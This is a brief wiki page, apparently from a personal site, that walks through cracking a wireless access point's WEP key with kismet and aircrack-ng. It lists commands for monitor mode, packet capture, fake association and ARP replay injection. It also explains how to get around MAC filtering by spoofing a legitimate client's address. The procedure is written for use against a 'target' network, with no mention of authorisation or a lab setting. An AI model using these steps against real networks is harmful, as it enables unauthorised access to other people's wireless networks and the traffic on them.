Cracking A WEP Key

From Nearline Storage
Jump to: navigation, search


  • Install kismet, kismet-plugins and aircrack-ng packages
  • Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked

These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits

  • Become root:
 su -
  • Put NIC into monitor mode:
 airmon-ng start wlan0
  • Start capturing packets:
 airodump-ng -w dumpfile --channel <channel> mon0

If you don't get enough traffic from the access point on that channel. start a new terminal session:

  • Associate with the target AP
 aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.

  • Start replaying packets so that we can collect more packets:
 aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.

  • Ctrl-C the dump process and crack the key:
 aircrack-ng dumpfile.ivs